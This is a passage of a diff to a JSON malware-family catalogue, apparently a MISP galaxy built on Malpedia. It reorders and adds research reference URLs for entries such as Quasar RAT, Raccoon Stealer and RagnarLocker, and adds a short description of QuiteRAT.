"https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", - "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", - "https://twitter.com/malwrhunterteam/status/789153556255342596", - "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", - "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", - "https://blog.morphisec.com/syk-crypter-discord", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", - "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", - "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", - "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://www.antiy.cn/research/notice&report/research_report/20201228.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/", - "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/", - "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://blog.ensilo.com/uncovering-new-activity-by-apt10", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf", - "https://blog.minerva-labs.com/trapping-quasar-rat", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", - "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/", - "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass", - "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques", - "https://blog.malwarelab.pl/posts/venom/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ", - "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://medium.com/cycraft/china-implicated-in-prolonged-supply-chain-attack-targeting-taiwan-financial-sector-264b6a1c3525", - "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", - "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://www.zscaler.com/blogs/security-research/snip3-crypter-reveals-new-ttps-over-time", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", + "https://blog.malwarelab.pl/posts/venom/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", + "https://www.bleepingcomputer.com/news/security/malware-now-using-nvidias-stolen-code-signing-certificates/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://blog.morphisec.com/syk-crypter-discord", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://www.antiy.cn/research/notice&report/research_report/20201228.html", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", + "https://www.bleepingcomputer.com/news/security/trojanized-dnspy-app-drops-malware-cocktail-on-researchers-devs/", + "https://blog.minerva-labs.com/trapping-quasar-rat", + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/07/29/new-qualys-research-report-evolution-of-quasar-rat", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://twitter.com/malwrhunterteam/status/789153556255342596", + "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers", "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://securelist.com/apt-trends-report-q1-2021/101967/", - "https://twitter.com/struppigel/status/1130455143504318466", + "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques", + "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://embee-research.ghost.io/hunting-quasar-rat-shodan", + "https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html", + "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", + "https://intel471.com/blog/privateloader-malware", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://therecord.media/chinese-hackers-linked-to-months-long-attack-on-taiwanese-financial-sector/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/" + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://mp.weixin.qq.com/s/n6XQAGtNEXfPZXp1mlwDTQ", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://embee-research.ghost.io/shodan-censys-queries/", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", + "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848", + "https://blog.rootshell.be/2022/02/11/sans-isc-cinarat-delivered-through-html-id-attributes/", + "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", + "https://securelist.com/apt-trends-report-q1-2021/101967/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", + "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass", + "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", + "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://twitter.com/struppigel/status/1130455143504318466", + "https://lab52.io/blog/another-cyber-espionage-campaign-in-the-russia-ukrainian-ongoing-cyber-attacks/", + "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", + "https://medium.com/cycraft/supply-chain-attack-targeting-taiwan-financial-sector-bae2f0962934", + "https://asec.ahnlab.com/en/31089/", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/" ], "synonyms": [ "CinaRAT", @@ -39732,8 +41602,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickheal", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", - "https://medium.com/insomniacs/quarians-turians-and-quickheal-670b24523b42" + "https://medium.com/insomniacs/quarians-turians-and-quickheal-670b24523b42", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf" ], "synonyms": [], "type": [] @@ -39759,8 +41629,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quietcanary", - "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/", - "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity" + "https://www.mandiant.com/resources/blog/turla-galaxy-opportunity", + "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/" ], "synonyms": [ "Kapushka", @@ -39784,6 +41654,24 @@ "uuid": "49aa0a57-812c-4344-9315-cd8c3220198e", "value": "QuietSieve" }, + { + "description": "QuiteRAT is a simple remote access trojan written with the help of Qt libraries.\r\n\r\nAfter sending preliminary system information to its C&C server, it expects a response containing either a supported command code or an actual Windows command (like systeminfo or ipconfig with parameters) to execute.\r\n\r\nIt was deployed in a campaign exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966).", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.quiterat", + "https://blog.talosintelligence.com/lazarus-quiterat/", + "https://businessinsights.bitdefender.com/tech-advisory-manageengine-cve-2022-47966", + "https://asec.ahnlab.com/ko/56256/", + "https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf" + ], + "synonyms": [ + "Acres" + ], + "type": [] + }, + "uuid": "03409fbe-c8ac-41f9-a89b-38dd9f7ef63d", + "value": "QuiteRAT" + }, { "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n", "meta": { @@ -39846,60 +41734,63 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", - "https://ke-la.com/information-stealers-a-new-landscape/", + "https://twitter.com/GroupIB_GIB/status/1570821174736850945", + "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8", + "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/", + "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949", "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/", "https://www.bleepingcomputer.com/news/security/massive-campaign-uses-youtube-to-push-password-stealing-malware/", "https://blog.cyble.com/2021/10/21/raccoon-stealer-under-the-lens-a-deep-dive-analysis/", - "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", - "https://d01a.github.io/raccoon-stealer/", - "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/", - "https://infosecwriteups.com/raccoon-stealer-v2-malware-analysis-55cc33774ac8", - "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram", - "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", - "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", - "https://twitter.com/GroupIB_GIB/status/1570821174736850945", - "https://asec.ahnlab.com/ko/25837/", - "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/", - "https://asec.ahnlab.com/en/35981/", - "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf", - "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/", - "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", - "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", - "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/", - "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/", - "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer", - "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block", - "https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view", - "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/", - "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949", - "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/", - "https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation", - "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/", - "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/", - "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/", - "https://www.group-ib.com/blog/fakesecurity_raccoon", "https://www.socinvestigation.com/raccoon-infostealer-malware-returns-with-new-ttps-detection-response/", - "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", - "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon", - "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d", + "https://ke-la.com/information-stealers-a-new-landscape/", + "https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram", "https://www.riskiq.com/blog/labs/magecart-medialand/", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://team-cymru.com/blog/2022/03/23/raccoon-stealer-an-insight-into-victim-gates/", + "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.youtube.com/watch?v=5KHZSmBeMps", - "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf", + "https://labs.k7computing.com/index.php/raccoon-back-with-new-claws/", + "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://cyberint.com/blog/financial-services/raccoon-stealer/", + "https://any.run/cybersecurity-blog/raccoon-stealer-v2-malware-analysis/", + "https://www.justice.gov/usao-wdtx/pr/newly-unsealed-indictment-charges-ukrainian-national-international-cybercrime-operation", + "https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/", "https://www.youtube.com/watch?v=1dbepxN2YD8", - "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family" + "https://cloudsek.com/recordbreaker-the-resurgence-of-raccoon", + "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", + "https://www.secureworks.com/research/the-growing-threat-from-infostealers", + "https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", + "https://medium.com/s2wblog/raccoon-stealer-is-back-with-a-new-version-5f436e04b20d", + "https://www.group-ib.com/blog/fakesecurity_raccoon", + "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer", + "https://d01a.github.io/raccoon-stealer/", + "https://www.zscaler.com/blogs/security-research/raccoon-stealer-v2-latest-generation-raccoon-family", + "https://asec.ahnlab.com/ko/25837/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", + "https://www.bleepingcomputer.com/news/security/raccoon-stealer-malware-suspends-operations-due-to-war-in-ukraine/", + "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", + "https://www.youtube.com/watch?v=kfl_2_NBVGc", + "https://blog.sekoia.io/raccoon-stealer-v2-part-2-in-depth-analysis/", + "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/", + "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block", + "https://asec.ahnlab.com/en/35981/", + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf", + "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/", + "https://drive.google.com/file/d/13HEi9Px8V583sRkUG4Syawuw5qwU-W9Q/view", + "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf", + "https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/", + "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/", + "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/" ], "synonyms": [ "Mohazo", @@ -39917,8 +41808,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.racket", - "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", - "https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12" + "https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical", + "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" ], "synonyms": [], "type": [] @@ -39969,52 +41861,52 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/", - "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf", - "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", - "https://www.acronis.com/en-sg/articles/ragnar-locker/", - "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/", - "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", - "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", - "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/", - "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", - "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information", - "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", - "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", - "http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/", "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", - "https://www.ic3.gov/Media/News/2022/220307.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/", + "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", + "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information", + "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/", + "https://www.ic3.gov/Media/News/2022/220307.pdf", + "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", - "https://securelist.com/targeted-ransomware-encrypting-data/99255/" + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", + "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/", + "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/", + "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.acronis.com/en-sg/articles/ragnar-locker/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", + "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", + 